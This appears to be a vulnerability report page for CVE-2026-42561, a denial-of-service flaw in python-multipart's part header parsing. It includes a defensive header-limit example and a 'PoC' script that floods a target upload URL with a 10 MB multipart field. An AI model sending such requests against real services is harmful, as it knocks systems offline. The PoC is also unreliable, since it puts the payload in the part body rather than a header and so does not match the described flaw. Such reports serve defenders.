Security Vulnerability Report
CVE-2026-42561

Published: 2026-05-13 21:16:47
Last Modified: 2026-05-14 17:00:31

Description

Python-Multipart is a streaming multipart parser for Python. Prior to 0.0.27, python-multipart has a denial of service vulnerability in multipart part header parsing. When parsing multipart/form-data, MultipartParser previously had no limit on the number of part headers or the size of an individual part header. An attacker could send a request with either many repeated headers without terminating the header block or a single very large header value, causing excessive CPU work before request rejection or completion. This vulnerability is fixed in 0.0.27.
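The two missing limits the description names (a cap on the number of part headers and a cap on the size of one header) are illustrated below by an added example; it is not python-multipart's own code and not the exact change shipped in 0.0.27, and the limit values and function names are assumptions chosen for the illustration.

```python
# Added example, not python-multipart's own code: a bounded reader for the
# header block of one multipart/form-data part. It enforces the two limits the
# advisory says were missing (headers per part, bytes per header line) while
# scanning, so CPU work is capped before a hostile block is fully consumed.
# Limit values and names below are illustrative assumptions.
from typing import Dict, Tuple

MAX_PART_HEADERS = 32        # assumed cap on header lines in one part
MAX_PART_HEADER_SIZE = 8192  # assumed cap on bytes in one header line


class PartHeaderLimitExceeded(ValueError):
    """Raised as soon as a limit is hit, before more bytes are processed."""


def parse_part_headers(data: bytes) -> Tuple[Dict[str, str], bytes]:
    """Parse the CRLF-delimited header block that precedes a part body.

    Returns (headers, remaining_bytes). A blank line ends the block. Repeated
    header names count towards the limit, because the advisory's first attack
    pattern is many repeated headers with no terminating blank line.
    """
    headers: Dict[str, str] = {}
    count = 0
    pos = 0
    while True:
        # Only look for CRLF within the allowed line length (+2 for the CRLF itself)
        end = data.find(b"\r\n", pos, pos + MAX_PART_HEADER_SIZE + 2)
        if end == -1:
            raise PartHeaderLimitExceeded(
                f"header line over {MAX_PART_HEADER_SIZE} bytes or block unterminated")
        line = data[pos:end]
        pos = end + 2
        if line == b"":
            return headers, data[pos:]
        count += 1
        if count > MAX_PART_HEADERS:
            raise PartHeaderLimitExceeded(f"more than {MAX_PART_HEADERS} headers in one part")
        name, sep, value = line.partition(b":")
        if not sep or not name.strip():
            raise ValueError("malformed part header line")
        headers[name.strip().decode("latin-1").lower()] = value.strip().decode("latin-1")


def rejects_part_headers(data: bytes) -> bool:
    """True when the header block trips one of the resource limits."""
    try:
        parse_part_headers(data)
    except PartHeaderLimitExceeded:
        return True
    return False
```

A well-formed part is parsed normally, while a block with more than 32 header lines, a single line over 8 KiB, or no terminating blank line is rejected after at most a bounded amount of scanning.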

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data is available in the NVD record; the affected range is python-multipart < 0.0.27 (fixed in 0.0.27).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder


def send_malicious_request(url):
    """
    Conceptual PoC for CVE-2026-42561.
    Sends a request with a very large header value to trigger CPU exhaustion.
    """
    # Generate a large string to simulate a large header value or part data
    large_value = "A" * 10000000  # 10MB string

    # In a real exploitation scenario, the attacker might need to manipulate raw sockets
    # to bypass client-side limits on header size.
    # Here we simulate sending a large payload in the multipart data.
    fields = {
        'field_name': ('filename.txt', large_value, 'text/plain')
    }

    try:
        # Create the multipart encoder
        multipart_data = MultipartEncoder(fields=fields)
        headers = {
            'Content-Type': multipart_data.content_type
        }

        # Send the POST request
        print(f"Sending malicious request to {url}...")
        response = requests.post(url, data=multipart_data, headers=headers, timeout=10)
        print(f"Request completed with status: {response.status_code}")
    except requests.exceptions.Timeout:
        print("Request timed out - potential DoS condition triggered.")
    except Exception as e:
        print(f"An error occurred: {e}")


if __name__ == "__main__":
    # Replace with the target URL
    target = "http://localhost:8000/upload"
    send_malicious_request(target)
```

NVD Record Details

Status: Deferred
Exploitability Score: 3.9
Impact Score: 3.6
Weakness: CWE-770 (Allocation of Resources Without Limits or Throttling)

References

https://github.com/Kludex/python-multipart/security/advisories/GHSA-pp6c-gr5w-3c5g